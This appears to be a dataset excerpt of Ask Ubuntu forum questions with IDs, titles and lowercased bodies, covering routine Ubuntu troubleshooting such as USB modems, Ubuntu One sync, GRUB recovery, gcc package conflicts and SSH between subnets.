device 003 : id 14cd:125c super top sd card reader bus 002 device 010 : id 1c9e:6061 omega technology wl-72b 3.5g modem # usb-devices t : bus=02 lev=02 prnt=02 port=01 cnt=02 dev # = 7 spd=480 mxch= 0 d : ver= 2.00 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1c9e prodid=6061 rev=00.00 s : manufacturer=qualcomm , incorporated s : product=qualcomm cdma technologies msm s : serialnumber=000000000002 c : # ifs= 4 cfg # = 1 atr=e0 mxpwr=500ma i : if # = 0 alt= 0 # eps= 3 cls=ff ( vend . ) sub=ff prot=ff driver=option i : if # = 1 alt= 0 # eps= 2 cls=ff ( vend . ) sub=ff prot=ff driver=option i : if # = 2 alt= 0 # eps= 2 cls=ff ( vend . ) sub=ff prot=ff driver=option i : if # = 3 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver=usb-storage # dmesg [ 74.655202 ] usb 2-1.2 : new usb device found , idvendor=1c9e , idproduct=6061 [ 74.655212 ] usb 2-1.2 : new usb device strings : mfr=3 , product=2 , serialnumber=4 [ 74.655218 ] usb 2-1.2 : product : qualcomm cdma technologies msm [ 74.655223 ] usb 2-1.2 : manufacturer : qualcomm , incorporated [ 74.655228 ] usb 2-1.2 : serialnumber : 000000000002 [ 74.660260 ] scsi6 : usb-storage 2-1.2:1.0 [ 77.720190 ] usb 2-1.2 : usb disconnect , device number 6 [ 77.897799 ] usb 2-1.2 : new high-speed usb device number 7 using ehci-pci [ 77.986096 ] usb 2-1.2 : new usb device found , idvendor=1c9e , idproduct=6061 [ 77.986107 ] usb 2-1.2 : new usb device strings : mfr=2 , product=1 , serialnumber=3 [ 77.986113 ] usb 2-1.2 : product : qualcomm cdma technologies msm [ 77.986118 ] usb 2-1.2 : manufacturer : qualcomm , incorporated [ 77.986123 ] usb 2-1.2 : serialnumber : 000000000002 [ 77.990175 ] scsi7 : usb-storage 2-1.2:1.3 [ 79.014680 ] scsi 7:0:0:0 : direct-access hspa mmc storage 2.31 pq : 0 ansi : 2 [ 79.015669 ] scsi 7:0:0:1 : cd-rom hspa mmc storage 2.31 pq : 0 ansi : 2 [ 79.018190 ] sd 7:0:0:0 : attached scsi generic sg3 type 0 [ 79.020417 ] sd 7:0:0:0 : [ sdc ] attached scsi removable disk [ 79.023790 ] sr1 : scsi-1 drive [ 79.024252 ] sr 7:0:0:1 : attached scsi cd-rom sr1 [ 79.024526 ] sr 7:0:0:1 : attached scsi generic sg4 type 5 [ 79.256276 ] iso 9660 extensions : microsoft joliet level 1 [ 79.258015 ] isofs : changing to secondary root [ 79.259663 ] selinux : initialized ( dev sr1 , type iso9660 ) , uses genfs_contexts [ 79.551148 ] usbcore : registered new interface driver option [ 79.552698 ] usbserial : usb serial support registered for gsm modem ( 1-port ) [ 79.570265 ] option 2-1.2:1.0 : gsm modem ( 1-port ) converter detected [ 79.570848 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 79.570911 ] option 2-1.2:1.1 : gsm modem ( 1-port ) converter detected [ 79.571283 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 79.571338 ] option 2-1.2:1.2 : gsm modem ( 1-port ) converter detected [ 79.571716 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 115.069111 ] ppp generic driver version 2.4.2 [ 115.121844 ] ppp bsd compression module registered [ 115.146879 ] ppp deflate compression module registered is there any solution for that ? . ( o.s is ubuntu 13.10 ) sorry for my bad english .
424809	what programs can i use to burn a windwos 7 iso on a usb ?	winusb keeps on freezing . unetbootin does n't work , and neither does tuxboot . i 'm running ubuntu 12.04 .
424810	ubuntu one suddenly fails to sync	u1 file sync between computers ( laptops , desktop , running 12.04 ) after years of uninterrupted service suddenly fails ( since at least a day , yesterday i noticed it for the first time ) . last successful download sync was 21 feb 10:00 cet . uploading directly using the web interface does not work either ; after 3 tries it fails with `` no files were uploaded due to an error . '' ( even with a tiny text file `` u1test.txt '' with just `` test '' in it ) . as long direct upload to u1 does not work , there is something seriously wrong with sync . an `` answer '' giving in a separate post ( install ubuntuone-couch is not relevant as it is already installed ) . nor delete file names with spaces ... i rely on u1 as my daily cloud service of choice for quite some time now .
424816	uninstall ubuntu from lenovo ideapad y510p	i have a lenovo ideapad y510p with windows 8.1 enterprise . i attempted to install ubuntu 12.04 from a bootable usb and once the installation was complete and i rebooted , i was shown the black terminal screen and could not access the desktop . startx does not work and every time i start the laptop , it boots straight to linux . i ca n't access windows at all . how do i remove ubuntu and boot windows again ? the screen i see when i log on is this . https : //www.dropbox.com/s/wpdfhk54va6ea9w/20140223_113205.jpg
424820	very easy iptables tutorial ?	where to find a easy `` iptables for dummies '' tutorial ? i know nothing about it and basically i need to allow only http , ssh and ftp connections ... thank you all
424822	problems loading live disk	very new linux user here , trying to get into litecoin mining . before all of my equipment came in , i installed a live version of ubuntu 12.04 onto a usb , then used that to install full version onto another usb so i can boot from that . did this all on a separate laptop . installed drivers and played around with it . seemed to work fine . now , my equipment is in . asus motherboard , 3x radeon 7950 graphics cards . i boot up the machine in bios and that works fine . exit bios and go into ubuntu with the live drive ( i am going to try to install fresh version of ubuntu on another flash drive using this equipment ) . this is what appears after everything is loaded : as you can see , the side and top bar come in clear , but the desktop ( and any other window that gets opened ) are jumbled . however , if i boot up with the full version on the usb i made on the other computer , it works fine ( i still want to wipe this drive clean and install fresh ) . no hard disk is being used . i have tried installing the ubuntu 12.04 image on 3 different flash drives ( one 2 gb and two 4 gb 's ) and none of them work on this machine ( but they worked fine on others ) .
424825	xubuntu 13.10 new app windows open with buttons at top of frame concealed	in xubuntu 13.10 , many apps , such as bluefish , calibre and firefox , when launched put their window off-kilter , high and to the right , so the top of the window 's frame is concealed . pressing { alt-enter } x to revert to ordinary sizing is vexing . for programs which do n't have size and position settings , how may i fix the location and size for opening windows , so the buttons at the top of the window are not hidden ? tried using settings manager to click on window manager tweaks , select the placement tab , and slide the bar under `` minimum size of windows to trigger smart placement : '' all the way to the right . this did not help . it may be relevant that panel 0 is at the top , and panel 1 is at the left . metacity is not in use . it happens whether or not display compositing is enabled in settings | windows manager tweaks | compositor .
424829	how to prevent ubuntu one from syncing specific files	is it possible to prevent ubuntu one from syncing specific files . i am using ubuntu one to sync files between my linux machine and windows machine and there are a couple of files in my eclipse workspace folders that are unique to the operating system , such as the class files for external tools since those tools are in different folders on their receptive machines , syncing those files , that identify those tools , would be counter productive . i have yet to find a way to accomplish this .
424831	how to install ubuntu 13.10 on an old sony computer ?	hi , i am a noobie to ubuntu , i have a freelander tablet that i want to develop apps for . i have an old sony mod : pcv-rx270ds , pentium iii cpu , mem : 256 mb . i tried to pre-install ubuntu 13.10 . the computer access the cd drv and starts to install . it opens up with a purple screen to small icons on bottom middle then goes blank a blinking cursor in upper left corner and then runs forever . all i see is the hdd activity light on the computer blinking on and off all the time . i let it run for 4 hr . one time and it did nothing .
424832	error : no such partition . grub boot loader gone	so i was an idiot and thought deleting my zorin partition ( which took over my boot loader ) would simply put everything back to pre-zorin . yea no . i have no recovery cd or ubuntu/zorin backup . i know this is n't a zorin forum but feel this should be similar . any ideas ?
424833	cursor not working in ubuntu 13.10	i just upgraded to ubuntu 13.10 . my mouse cursor was first invisible . i found a solution searching stackoverflow . this made my cursor appear . however , it is impossible to move this latter . i didn'4 find many bug reports related to this issue and no solution . anyone has an idea please ?
424834	installing ubuntu in a acer e1 with uefi	i have a cheap $ 300 acer e1 series laptop with uefi and windows 8 . btw , the only `` bios '' in the boot menu is uefi . i want to wipe windows 8 completely off the hdd and replace it with ubuntu or fedora . i 'll try ubuntu first even though i heard that fedora has better support for all that uefi junk . i wrote the 64 bit ubuntu iso to usb ( made with unetbootin ) and dvd so that i could install it on my laptop . first , i disabled the uefi . when i boot with a live usb or dvd of ubuntu , i get a black screen with 3 options - install , try , check something . when i choose install , i get a black screen . it stays there forever . how do i even know that i can install ubuntu on this system ? this laptop does not come with a dvd/cd drive . i am using an external . does n't matter . i returned it all .
424837	how to instantiate ssh session between computers in two networks ?	i have the following home network : ubuntu 12.04.4 - > router 1 - > router 2 - > ubuntu 12.04.2 i am able to make ssh connections if the machines are in one local area network as follows : ubuntu 12.04.4 - > router 1 - > ubuntu 12.04.2 but i have issues to instantiate ssh session between 12.04.4 and 12.04.2 machines ( in the first case ) . i guess the issue is that they have the following ip addresses assigned : 12.04.4 - 192.168.0.4 12.04.2 - 192.168.1.100 and because of this they are not in the same network . could anyone tell if i can instantiate ssh session in this case ? note , i can reset routes to factory settings any time and configure them as i like .
424840	can not start log in through rdp after restart ( ubuntu server 12.04 lts )	i have installed xrdp , unity-2d and xubuntu-desktop on my vps remote server with ubuntu to have a remote rdp access to it . by the first time it worked fine . but after rebooting i can not log in into it throug mstsc ( on windows 7 ) and have an error : remote access to the server is not enabled but still i can access my vps through ssh through terminal without any problem . what should i do to start ( or restart ) my rdp on ubuntu ( because for the first time , before restart of the server everything worked perfectly ) . i have already tried to restart xrdp in /etc/init.d/ but it does not work . thank you for your responses !
424841	tint2 : fontconfig error	i recently installed ubuntu 12.04 lts . i am attempting to configure tint2 , i got it installed and ready to go , but when i go to the terminal and start it up by typing tint2 i get this : real transparency on ... depth : 32 xrandr : found crtc 's : 6 xrandr : linking output lvds with crtc 0 tint2 : another systray is running pid=6801 tint2 : nb monitor 1 , nb monitor used 1 , nb desktop 1 fontconfig error : can not load default config file i 'm guessing the problem lies in the fontconfig error , i tried downloading a fonts.conf from http : //www.stata.com/support/faqs/unix/fontconfig-error/ and putting it into /usr/share/fonts but it did n't work either . does anyone know how to fix this ? i also tried putting it into my home directory with the same results
424845	ubuntu server cron job does n't work	my script that is supposed to run only when the server is on is n't working correctly when run by cron . if i run it manually , it works . backup ( ) { if pidof java & > /dev/null ; then screen -p 0 -s minecraft -x eval `` stuff \ '' say server backing up\ '' \015 '' # we need to first put the server in readonly mode to reduce the chance of backing up half of a chunk . screen -p 0 -s minecraft -x eval `` stuff \ '' save-off\ '' \015 '' screen -p 0 -s minecraft -x eval `` stuff \ '' save-all\ '' \015 '' sleep 10 cd ~/minecraft mkdir backup tar cvfpz backup/y- $ ( date + % y_m- % m_d- % d_t- % h_ % m ) -world.backup.tar.gz world/ screen -p 0 -s minecraft -x eval `` stuff \ '' save-on\ '' \015 '' screen -p 0 -s minecraft -x eval `` stuff \ '' say server done backing up\ '' \015 '' # delete old backups echo deleting old backups find . -name '*-world.backup* ' -mtime +5 -delete else echo minecraft server not on fi } i 'm wondering if anyone knows why it 's not stopping the backup if the server is stopped ?
424846	how to install programs like `` wine '' or `` dolphin ''	i am very new to ubuntu . i have been tring to load `` wine '' and `` dolphin '' on my system . every thing i have tride and all the instruction i have followed have been useless . is there a straight forward non-geek way for me to install these programs ?
424848	new photos not uploading to ubuntu one from android	i set up ubuntu one to back up my pictures from my android phone and took a photo to test . it worked . last week i took four new pictures and they have not been backed up . i have tried in working wifi networks , both by pressing `` upload all photos now '' in settings and by manually trying to add the pictures . i have only used up 3.5 of 5gb of my storage . can anyone help me with this please ?
424849	partitioning a 256gb ssd	i 'm planning to buy a dell xps 13 developer edition . it comes with 256 gb of ssd . my intention is to install ubuntu gnome and i 'm not sure of how my partitions should be arranged . i 've always used root and home in different partitions , but i have no experience with ssd disks and i have no clue . my guess is : 20gb for root ( at the beginig ) , 8gb for swap ( at the end ) and the rest for /home . but , i repeat , i have no idea even if it 's a good idea to do this on a ssd . also , it would be helpful to know whether the have to be primary or logical partitions . any recommendation for my case ?
424855	mouse-key remap not recognized by application ( maya ) ?	i need mouse button 8 , to be remapped to left alt . i need it to work in maya . i 've already disabled window move with dconf , so that it would n't effect maya . then i followed this guide and it seems to be correct , except maya doesnât register the change . i used xbindkeysrc with : '' xte 'keydown alt_l ' 'key alt_l ' 'keyup alt_l ' '' b:8 i think xev seems to register the change correctly when i press the remapped button : keypress event , serial 33 , synthetic no , window 0x2800001 , root 0x2a8 , subw 0x0 , time 2747573 , ( 174,175 ) , root : ( 181,412 ) , state 0x10 , keycode 64 ( keysym 0xffe9 , alt_l ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 33 , synthetic no , window 0x2800001 , root 0x2a8 , subw 0x0 , time 2747574 , ( 174,175 ) , root : ( 181,412 ) , state 0x18 , keycode 64 ( keysym 0xffe9 , alt_l ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false enternotify event , serial 33 , synthetic no , window 0x2800001 , root 0x2a8 , subw 0x0 , time 2748388 , ( 174,175 ) , root : ( 181,412 ) , mode notifyungrab , detail notifyancestor , same_screen yes , focus yes , state 16 keymapnotify event , serial 33 , synthetic no , window 0x0 , keys : 4294967208 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 running ubuntu 12.04 lts with maya 2014 sp2
424856	where to find the full text of `` typing '' options in gnome-tweak-tool	while trying to fiddle with my multi-language keyboard configuration broken by this bug , i stumbled again on this screen in gnome-tweak-tool , `` typing '' section : as you can see , option text is severely truncated and there is no tooltip emerging to explain the full function ( the same problem is repeated on most of the other drop-down menus ) . i say `` again '' because i filed this bug some time ago . the question : is there somewhere a place ( configuration file , gsetting , dbus comment , source file , whatever ) where i can find the full text of the options here ?
424861	increase more than 18 the font size in all tty ?	in this post appear the is only possible to use number 18 in all tty , but i want to increase more than this , like this image below ! [ fedora core ] [ 2 ] is possible to make exactly equal ?
424868	can not install gcc-4.8 because of unmet dependencies	i was trying to upgrade gcc-4.8.1 to gcc-4.8.2 using synaptic from this ppa . the installation executed with no problem , but suddenly i had no gcc-4.8 at all . i was using gcc-4.7 and gcc-4.8 together , but only 4.7 is left for some reason . then i tried to reinstall gcc-4.8 using apt-get install but i got unmet dependencies errors . i tried to solve this problem using the answers to this question , but to no avail . sudo apt-get install gcc-4.8 results in : ... the following packages have unmet dependencies : gcc-4.8 : depends : binutils ( > = 2.23.90.20131017 ) but 2.23.52.20130913-0ubuntu1 is to be installed e : unable to correct problems , you have held broken packages . here are the outputs of : martin @ martin-studio-1537 : ~ $ cat /etc/apt/sources.list deb http : //archive.ubuntu.com/ubuntu saucy main universe restricted multiverse deb http : //security.ubuntu.com/ubuntu/ saucy-security main universe restricted multiverse deb http : //archive.ubuntu.com/ubuntu saucy-updates main universe restricted multiverse deb http : //archive.ubuntu.com/ubuntu saucy-proposed main universe restricted multiverse deb-src http : //archive.ubuntu.com/ubuntu saucy main universe restricted multiverse # added by software-properties deb http : //ppa.launchpad.net/ubuntu-toolchain-r/test/ubuntu saucy main and martin @ martin-studio-1537 : ~ $ cat /etc/apt/sources.list.d/* # deb http : //download.mendeley.com/apt/ stable main deb http : //ppa.launchpad.net/p12/qtcreator/ubuntu saucy main deb-src http : //ppa.launchpad.net/p12/qtcreator/ubuntu saucy main deb http : //ppa.launchpad.net/p12/qtcreator/ubuntu saucy main # deb-src http : //ppa.launchpad.net/p12/qtcreator/ubuntu saucy main deb-src http : //ppa.launchpad.net/ubuntu-toolchain-r/test/ubuntu saucy main deb-src http : //ppa.launchpad.net/ubuntu-toolchain-r/test/ubuntu saucy main # deb http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu saucy main # deb-src http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu saucy main # deb http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu saucy main # deb-src http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu saucy main i tried to repeat the suggestions in the answers after disabling all ppas and then again with the gcc-4.8.2 ppa enabled and i still can not install gcc-4.8.2 . what did i do wrong and how can i fix my system ? edit : i tried martin @ martin-studio-1537 : ~ $ sudo apt-get install -f [ sudo ] password for martin : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . and then sudo apt-get update but the result is the same . i tried everything in this answer with the exception of purging or removing ppas . edit2 : i followed instructions from searchforgold6789 's answer and it did work ! i successfully installed gcc-4.8.1 . but when i added the ppa again and tried to upgrade , i got the following output : the following packages have been kept back : cpp-4.8 g++-4.8 gcc-4.8 gcc-4.8-base libasan0 libatomic1 libgcc-4.8-dev libgcc1 libgcc1-dbg libgfortran3 libgomp1 libitm1 libquadmath0 libstdc++-4.8-dev libstdc++6 libstdc++6-4.8-dbg the following packages will be upgraded : libcloog-isl4 libisl10 2 upgraded , 0 newly installed , 0 to remove and 16 not upgraded . edit3 : when i do a apt-get dist-upgrade it suggests that g++-4.8 gcc-4.8 should be removed . why is this so ? should i proceed ? i think this was the reason i got into this trouble in the first place . martin @ martin-studio-1537 : ~ $ sudo apt-get dist-upgrade ... the following packages will be removed : g++-4.8 gcc-4.8 the following packages will be upgraded : cpp-4.8 gcc-4.8-base libasan0 libatomic1 libgcc-4.8-dev libgcc1 libgcc1-dbg libgfortran3 libgomp1 libitm1 libquadmath0 libstdc++-4.8-dev libstdc++6 libstdc++6-4.8-dbg 14 upgraded , 0 newly installed , 2 to remove and 0 not upgraded . need to get 14.9 mb of archives . after this operation , 32.4 mb disk space will be freed .
424869	13.10 gnome side screens	i 'm running gnome 3.10.1 and i 'm trying to watch a video on my tv via hdmi cable . the problem i 'm encountering is that i have those 2 side screens on the right side of the homescreen that i can switch between and i want to get rid of one so that the video and audio will play on my tv . right now i can drag my web browser over the other screen but the audio is still only playing through my computer . help ? update*** i got the volume issue figured out , i 'm an idiot . but now since i messed around with the display my screen is zoomed in . i have two black bars on the sides of my screen so i 'm only using about 80 % of my screen space . how do i fix this ?
424878	alternative way to download and install ubuntu touch ( dual boot ) on nexus 4	since i have connection issues ( i live in china , where nothing will download properly except if provided a mirror inside china ) , i have downloaded the clockworkmod recovery image for mako , the installer.zip , and followed the instructions inside dualboot.sh manually : i had cyanogenmod so su was already there , etc . the situation now is , i have the ubuntu dual boot apk installed on android , and running fine . but now i have a connection issue i can not solve : the download is getting started , the small images like image-master.tar.xz and image-signing.tar.xz downloaded fine , but i have n't been able to download the big image ubuntu- [ long-hashtag-i-wont-copy-here ] .tar.xz . so my question is , is there another way to download this image ( if there is only one , i do n't know what comes next ) and to flash it manually ? thanks in advance !
424892	change `` date '' command to 12 hour time instead of 24	when i type `` date '' in gnome-terminal , or xterm it reads out in 24 hour time , is there any way to make it use 12 hour . according to `` date -- help '' using `` % r '' should do the trick , but there are no examples given as to how to input that command . i 've tried `` date % r '' , and `` date % r '' but they do n't work . it should be noted that my gui clock on the top panel of my screen is using 12 hour format at the moment . screenshot : http : //i.stack.imgur.com/rcmqv.png
424895	error when installing xboxdrv	i get an error when installing xboxdrv . system : ubuntu 13.10 sudo apt-get install xboxdrv reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : printer-driver-hpijs use 'apt-get autoremove ' to remove it . the following packages will be removed : xserver-common-lts-saucy the following new packages will be installed : xboxdrv 0 upgraded , 1 newly installed , 1 to remove and 2 not upgraded . 1 not fully installed or removed . need to get 0 b/663 kb of archives . after this operation , 29.7 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 171139 files and directories currently installed . ) removing xserver-common-lts-saucy ... removing 'diversion of /usr/lib/xorg/protocol.txt to /usr/lib/xorg/protocol-precise.txt by xserver-common-lts-saucy' dpkg-divert : error : rename involves overwriting `/usr/lib/xorg/protocol.txt ' with different file `/usr/lib/xorg/protocol-precise.txt ' , not allowed dpkg : error processing xserver-common-lts-saucy ( -- remove ) : subprocess installed post-removal script returned error exit status 2 *errors were encountered while processing : xserver-common-lts-saucy e : sub-process /usr/bin/dpkg returned an error code ( 1 ) * please help
424896	usb device not recognised - ubuntu desktop 12.04.4 lts	ubuntu has just stopped recognising my nexus 5 when i connect via usb . the nexus 5 confirms it is connected as a 'media device ' ( mpt ) rather than a 'camera ' ( ptp ) . it worked fine a week ago ( i do n't plug it in to ubuntu everyday ) . i believe that one of the ubuntu updates i ran this week updated the kernel , so that is my best guess of 'what has changed ' , but i can not be sure . i have read other similar ( usb recognition ) threads , none of which had any suggestions that have helped in this case , and it seems that the op is frequently asked to provide the following : lsusb : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 147e:2016 upek biometric touchchip/touchstrip fingerprint sensor bus 001 device 005 : id 04f2 : b217 chicony electronics co. , ltd bus 002 device 004 : id 18d1:4ee1 google inc. dmesg |tail : [ 21468.334229 ] usb 2-1.1 : manufacturer : lge [ 21468.334233 ] usb 2-1.1 : serialnumber : [ 16 hex chars - confirmed to phone ] [ 21488.974139 ] usb 1-1.4 : usb disconnect , device number 4 [ 22520.824693 ] usb 2-1.1 : usb disconnect , device number 3 [ 27274.876863 ] usb 2-1.1 : new high-speed usb device number 4 using ehci-pci [ 27274.970098 ] usb 2-1.1 : new usb device found , idvendor=18d1 , idproduct=4ee1 [ 27274.970106 ] usb 2-1.1 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 27274.970111 ] usb 2-1.1 : product : nexus 5 [ 27274.970115 ] usb 2-1.1 : manufacturer : lge [ 27274.970119 ] usb 2-1.1 : serialnumber : [ 16 hex chars - confirmed to phone ] ( i am not sure if the serial number is something i should post publicly , so i have deleted it from above , but i confirmed it against what the phone says so i am 100 % sure that i am getting the right info . ) for avoidance of doubt : lsb_release -a : no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise uname -r : 3.8.0-36-generic unfortunately , i can not tell you what kernel version i had last week . it seems to me that the device is 'recognised ' in that it is listed in lsusb , but it is not 'recognised ' somewhere along the line in that i can not see it at all in fdisk , or gparted ( for example ) . again , for the avoidance of doubt , i do not mean that it is unmounted ( in gparted for example ) - it is not even listed there , despite lsusb showing it . i am stumped , so any suggestions are welcome . thanks , alan .
424897	lost partitions	i installed xubuntu choosing the option `` write over windows partition '' or something like that . this installed over all my partitions . i opened terminal , and typed the commands lsblk and it shows that my xubuntu installation is taking up my whole 1tb hdd . how do i get my non-windows partition back ? any software recommendations ? i only have xubuntu installed on this machine !
424899	why does apt-get want to remove gcc-4.8 and g++-4.8 when i try to upgrade ?	i am trying to upgrade gcc-4.8.1 and g++-4.8.1 to 4.8.2 . i added the ppa containing g++-4.8.2 , ran apt-get update and then when i try : martin @ martin-studio-1537 : ~ $ sudo apt-get upgrade [ sudo ] password for martin : ... the following packages have been kept back : cpp-4.8 g++-4.8 gcc-4.8 gcc-4.8-base libasan0 libatomic1 libgcc-4.8-dev libgcc1 libgcc1-dbg libgfortran3 libgomp1 libitm1 libquadmath0 libstdc++-4.8-dev libstdc++6 libstdc++6-4.8-dbg 0 upgraded , 0 newly installed , 0 to remove and 16 not upgraded . the packages i need to upgrade are kept back . when i try : martin @ martin-studio-1537 : ~ $ sudo apt-get dist-upgrade ... the following packages will be removed : g++-4.8 gcc-4.8 the following packages will be upgraded : cpp-4.8 gcc-4.8-base libasan0 libatomic1 libgcc-4.8-dev libgcc1 libgcc1-dbg libgfortran3 libgomp1 libitm1 libquadmath0 libstdc++-4.8-dev libstdc++6 libstdc++6-4.8-dbg 14 upgraded , 0 newly installed , 2 to remove and 0 not upgraded . need to get 14.9 mb of archives . after this operation , 32.4 mb disk space will be freed . the system wants to remove g++-4.8 gcc-4.8 . when i try to install gcc-4.8 from synaptic it wants to remove g++-4.8 and when i tell that it is ok to remove it , i get this error : how can i install gcc-4.8.2 and g++-4.8.2 ? edit : as souravc suggested , i did martin @ martin-studio-1537 : ~ $ dpkg -l | grep `` ^rc '' | awk ' { print $ 2 } ' and this is the result : autoconf bcmwl-kernel-source dkms lib64gcc1 libbotan-1.10-0 libc6-amd64 libc6-x32 libpcrecpp0 : i386 libqt5clucene5 : i386 libqt5declarative5 : i386 libqt5designer5 : i386 libqt5designercomponents5 : i386 libqt5help5 : i386 libqt5quickparticles5 : i386 libqt5quicktest5 : i386 libqt5script5 : i386 libsigsegv2 : i386 libx32gcc1 libx32stdc++6 linux-image-3.11.0-12-generic linux-image-3.11.0-15-generic linux-image-extra-3.11.0-12-generic linux-image-extra-3.11.0-15-generic usb-creator-gtk
424900	can not access ubuntu when i leave it alone for a while	i have installed ubuntu 12.04.3 lts . dual-boot with windows 7 . 64bit everything works fine . the problem is that , i run some python code in ubuntu . and i left it alone . when i came back , there is not input to the screen . i just click the mouse and keyboard , there 's no response . but the desktop light is on . for now , i can only press the power button on the desktop to turn computer on , and press the power button again to start the computer . it happened twice . so how can i solve the problem . if i leave just a short time , i can access the ubuntu system . if i leave a long time , like more than 8 hours , there is no input to the screen . and i am not sure whether the ubuntu is working or not . the system is not responding .
424902	when i start my computer i can see my flash drive . but when i click it ... it goes away	when i start my computer . i can see my flash drive . but when i click it it goes away . how can i show it again . ( something similar to 'mycomputer ' in windows )
424903	what determines what is present in gsettings ?	i 'm on xubuntu 13.10 . i ran this command : $ gsettings list-recursively > ~/desktop/gset.txt i see a lot of stuff unrelated to xubuntu . for example : com.canonical.unity.lenses always-search [ 'applications.scope ' , 'music.scope ' , 'videos.scope ' , 'files.scope ' ] com.canonical.unity.lenses disabled-scopes @ as [ ] com.canonical.unity.lenses hidden-scopes @ as [ ] com.canonical.unity.lenses home-lens-default-view [ 'applications.scope ' , 'files.scope ' ] com.canonical.unity.lenses home-lens-priority [ 'files.scope ' , 'music.scope ' ] com.canonical.unity.lenses locked-scopes @ as [ ] com.canonical.unity.lenses remote-content-search 'all' why are these entries present ? is it because there is a `` default '' gsettings that is packaged along with all the official flavors derived from ubuntu ?
424907	ap mode alternative in ubuntu 13.10	recently i was trying to setup my ubuntu 13.10,32-bit into a wifi-hotspot . but after some research , i found that my network card does not support `` ap mode '' . i want to make my laptop as a wifi-hotspot . the fourth line of highlighted part in the image above says that `` software interface modes ( can always be added ) '' . what does this exactly mean ? is there any solution to my problem ? can i use `` alfa network card '' to make my ubuntu as a hotspot ? regards ,
424908	how to create a native application from a shell script ?	i created a little application using bash and zenity that i wish to install on my system as a native application as well as a package that i can distribute . i have a .desktop file for my application , a .png icon , and the .sh file . where do these files go to make a `` native '' application , and by what process would i need to go to create a package that can be compiled to install this application on another system ?
424912	open man pages in help window using terminal	while using gnome do , i discovered that man pages could also be opened in help window as shown in this image . what is the command to open manuals in help through terminal ?
424913	automount ntfs partition read-only if not cleanly unmounted	i have configured to automount my ntfs data partition on boot : # /media/win8 was on /dev/sda5 during installation uuid=a47a42ff7a42cdac /media/win8 ntfs defaults , umask=007 , gid=46 0 0 this works fine , as long as long as the partition is cleanly unmounted and windows did n't go to suspend with it ( which could be avoided if you wish ) . if it is in suspend state it is still safe to mount it readonly with sudo mount -o ro /media/win8 how can i tell ubuntu to do this automatically if it can not mount it rw ?
424918	installing flash player for mozilla	0 down vote does ubuntu have a built in anti virus ? i 'm currently installing it and while browsing i tried to download flash for mozilla but their website keeps on prompting me to disable it first before i can get it , if ubuntu does n't have an anti virus the first time you install it then why adobes website is asking me to turn it off
424919	about setup wizard	when i install a program on ubuntu , the installation run on terminal , no setup wizard window is opened . what can i do so that new window will open ?
424922	what is sudo ? i ca n't access to it	i am very very new to all of this . i get it that sudo is some kind of authorisation . when it asks for the password , i ca n't type anything . edit : omg guys thanks . i just realized that i might have a solution for my wireless network now ! ! well since i had no idea what sudo was and when i tried to boot up 12.10 i could n't since i thought i could n't access to it ! yes , i 'm gon na try this out !
424931	xsetwacom ca n't map keys correctly	i recently bought a wacom intuos listed with xsetwacom as wacom intuos pt m. i figured out how to configure the buttons and actions , but when i try to set any button to some particular letters , they are replaced by others . here is a table of the results letter | letter typed | mapped -- -- -- -- -- -- -- - a | **q** b | b c | c d | d e | e f | f g | g h | h i | i j | j k | k l | l m | **ăš** n | n o | o p | p q | q r | r s | s t | t u | u v | v w | w x | x y | **z** z | **w** ( more with the non-letter characters ) the keyboard looky partially mapped as an azerty ( french ) keyboard , but not totally . i therefore ca n't map the letters a , m and y , because both a and q produce q . do anybody know a workaround , like using unicode to map letters ? i 'm using ubuntu 13.10 , 64bit with a swiss keyboard ( qwertz ) .
424934	install window in partion	2 days ago installed ubuntu12.104 on my laptop dell xps l502x .everything is all right but it make me upset in sound quality .so i want to install window along with ubuntu12.04 .clean install ubuntu12.04 on my system so make partion of 1. ext4 / 8gb 2. swap 8.2 gb 3/home 730 gb now i want to make partion of 730 gb and make 50 gb for window and left for both use for ubuntu and window ( common data ) .and also make ubuntu my primary os and window secondry ? so kindly help me
424935	unmet dependencies while installing cinnamon	w : failed to fetch http : //ppa.launchpad.net/merlwiz79/cinnamon-ppa/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/merlwiz79/cinnamon-ppa/ubuntu/dists/quantal/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . ashley @ ashley-sve15113fdw : /etc/apt $ sudo apt-get install cinnamon reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : cinnamon : depends : cinnamon-common ( = 2.0.14-20131203040047-quantal ) but 2.0.14-20131203040103-precise is to be installed recommends : cinnamon-screensaver but it is not going to be installed recommends : gir1.2-cjsdbus-1.0 but it is not installable recommends : cinnamon-bluetooth but it is not going to be installed e : unable to correct problems , you have held broken packages . ashley @ ashley-sve15113fdw : /etc/apt $
424944	dwm with gnome classic	three years ago i used dwm ( dynamic window manager for x ) . but dwm does n't have such features as workspaces , menues with switches for user account , system and standard utilities etc . how can i use dwm with gnome classic ?
